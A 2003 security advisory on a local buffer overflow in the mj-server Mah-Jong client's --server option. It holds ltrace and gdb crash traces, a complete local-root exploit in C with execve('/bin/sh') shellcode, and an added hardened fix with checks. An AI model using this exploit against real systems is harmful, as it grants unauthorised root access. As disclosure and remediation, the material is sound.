[UNIX] mj-server Long Hostname Buffer Overflow (client)

From: SecuriTeam (support_at_securiteam.com)
Date: 09/29/03

    To: list@securiteam.com
    Date: 29 Sep 2003 12:57:04 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      mj-server Long Hostname Buffer Overflow (client)
    ------------------------------------------------------------------------

    SUMMARY

    xmj, mj-server and mj-player are programs used for playing Mah-Jong. A
    locally exploitable buffer overflow has been found in mj-server,
    allowing local attackers to gain gid root privileges. The overflow is
    triggered through one of the program's client-side parameters.

    DETAILS

    Example:
    [root@localhost mj-1.4-src]# ltrace ./mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    __libc_start_main(0x08048fd2, 3, 0xbffff964, 0x08048a98, 0x08063d70 <unfinished ...>
    strcmp("--server", "--id") = 1
    strcmp("--server", "--server") = 0
    time(NULL) = 1063103272
    srand(0x3f5dab28, 0x08063f1e, 1763, 2114, 1014) = 0
    strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., ':') = NULL
    strcpy(0xbffff0d2, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff0d2
    socket(1, 1, 0) = 3
    connect(3, 0xbffff0d0, 110, 0xbffff0d2, 0) = -1
    perror("connect_to_host: connect failed") = <void>
    connect_to_host: connect failed: No such file or directory
    perror("client_init: connect_to_host fai"...) = <void>
    client_init: connect_to_host failed: Illegal seek
    exit(1) = <void>
    +++ exited (status 1) +++
    [root@localhost mj-1.4-src]# ltrace ./mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAA
    __libc_start_main(0x08048fd2, 3, 0xbffff8f4, 0x08048a98, 0x08063d70 <unfinished ...>
    strcmp("--server", "--id") = 1
    strcmp("--server", "--server") = 0
    time(NULL) = 1063103280
    srand(0x3f5dab30, 0x08063f1e, 1763, 2114, 1014) = 0
    strchr("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., ':') = NULL
    strcpy(0xbffff062, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"...) = 0xbffff062
    socket(1, 1, 0) = 3
    connect(3, 0xbffff060, 110, 0xbffff062, 0) = -1
    perror("connect_to_host: connect failed") = <void>
    connect_to_host: connect failed: Connection refused
    --- SIGSEGV (Segmentation fault) ---
    +++ killed by SIGSEGV +++
    [root@localhost mj-1.4-src]# gdb ./mj-player
    GNU gdb Red Hat Linux (5.2.1-4)
    Copyright 2002 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.

    This GDB was configured as "i386-redhat-linux"...
    (gdb) r --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAA
    Starting program: /home/mj-1.4-src/mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAA
    connect_to_host: connect failed: Connection refused

    Program received signal SIGSEGV, Segmentation fault.
    0x08004141 in ?? ()
    (gdb) r --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAA
    The program being debugged has been started already.
    Start it from the beginning? (y or n) y

    Starting program: /home/mj-1.4-src/mj-player --server
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAA
    connect_to_host: connect failed: Connection refused

    Program received signal SIGSEGV, Segmentation fault.
    0x41414141 in ?? ()
    (gdb)

    Exploit:
    /*
     * mj-server(client) local root (possible in debian) exploit
     * tested in redhat7.2 - redhat8.0
     * coded by jsk
     *
     * (c) Ph4nt0m Security Team / www.ph4nt0m.org
     *
     */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>      /* strlen, memset, memcpy */
    #include <unistd.h>
    #define BUFSIZE 150

    /* 90 NOP bytes followed by a setuid(0), execve("/bin/sh"), exit payload */
    char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
    "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
    "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
    "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
    void banner (void);

    void banner (void)
    {
        fprintf (stdout, "\n [+] mj-server local exploit mail:<jsk@ph4nt0m.net>");
        fprintf (stdout, "\n [+] by jsk <www.ph4nt0m.org> talk with me <irc.0x557.org #ph4nt0m> ");
        fprintf (stdout, "\n [+] spawning shell \n\n");
    }

    int main(void)
    {
        char buf[BUFSIZE+16];
        char *prog[] = {"/home/mj-1.4-src/mj-server", "--server", buf, NULL};
        char *env[] = {"HOME=jsk", shellcode, NULL};
        /* The payload is passed in the environment, which sits at the top of
         * the stack; its address is derived from the stack top, the program
         * path and the payload length */
        unsigned long ret = 0xc0000000 - sizeof(void *) - strlen(prog[0]) -
                            strlen(shellcode) - 0x02;
        memset(buf, 0x41, sizeof(buf));          /* filler up to the saved return address */
        memcpy(buf+BUFSIZE, (char *)&ret, 4);    /* overwrite the return address */
        memcpy(buf+BUFSIZE+4, (char *)&ret, 4);
        memcpy(buf+BUFSIZE+8, (char *)&ret, 4);
        buf[BUFSIZE+12] = 0x00;
        printf("\n [+] Using address: 0x%lx", ret);
        banner ();
        execve(prog[0], prog, env);
        return 0;
    }
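
    The defect the traces above pin down, as an added example that is not the advisory's or the mj package's own code: socket(1, 1, 0) is AF_UNIX/SOCK_STREAM and the connect() length of 110 is sizeof(struct sockaddr_un), so a --server argument without a ':' is strcpy()'d into the 108-byte sun_path of a stack-resident sockaddr_un with no length check. The function names below are assumed for illustration; the hardened form measures the argument first and refuses anything that does not fit.

```c
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
/* Vulnerable pattern as the ltrace output shows it (names assumed): no ':'
 * in the argument, so it is strcpy()'d as a UNIX socket path into
 * sun_path[108] of a sockaddr_un on the stack; >107 bytes run past it. */
int unsafe_fill_unix_addr(const char *arg, struct sockaddr_un *sun)
{
    sun->sun_family = AF_UNIX;
    strcpy(sun->sun_path, arg);          /* no bound on strlen(arg) */
    return 0;
}
/* Hardened form: measure first, refuse anything that cannot fit with its
 * terminating NUL, then copy a known number of bytes. */
int safe_fill_unix_addr(const char *arg, struct sockaddr_un *sun)
{
    size_t n = strlen(arg);
    if (n == 0 || n >= sizeof(sun->sun_path))
        return -1;                       /* caller reports "path too long" */
    memset(sun, 0, sizeof(*sun));
    sun->sun_family = AF_UNIX;
    memcpy(sun->sun_path, arg, n + 1);   /* n + 1 <= sizeof(sun_path), NUL included */
    return 0;
}
/* Same dispatch the client performs on --server: "host:port" selects TCP
 * (returned as 1, handled elsewhere); anything else is a UNIX socket path. */
int parse_server_arg(const char *arg, struct sockaddr_un *sun)
{
    if (strchr(arg, ':') != NULL)
        return 1;
    return safe_fill_unix_addr(arg, sun);
}
/* Constructed checks: a path that fits, and the advisory's crashing input
 * length of 156 'A's (the run that ended at 0x08004141). */
int short_path_accepted(void)
{
    struct sockaddr_un sun;
    return parse_server_arg("/tmp/mj-server.sock", &sun) == 0
        && strcmp(sun.sun_path, "/tmp/mj-server.sock") == 0;
}
int overlong_arg_rejected(void)
{
    char arg[157];                       /* 156 'A's + NUL */
    struct sockaddr_un sun;
    memset(arg, 'A', 156);
    arg[156] = '\0';
    return parse_server_arg(arg, &sun) == -1;
}
```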

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:jsk@ph4nt0m.net> jsk.
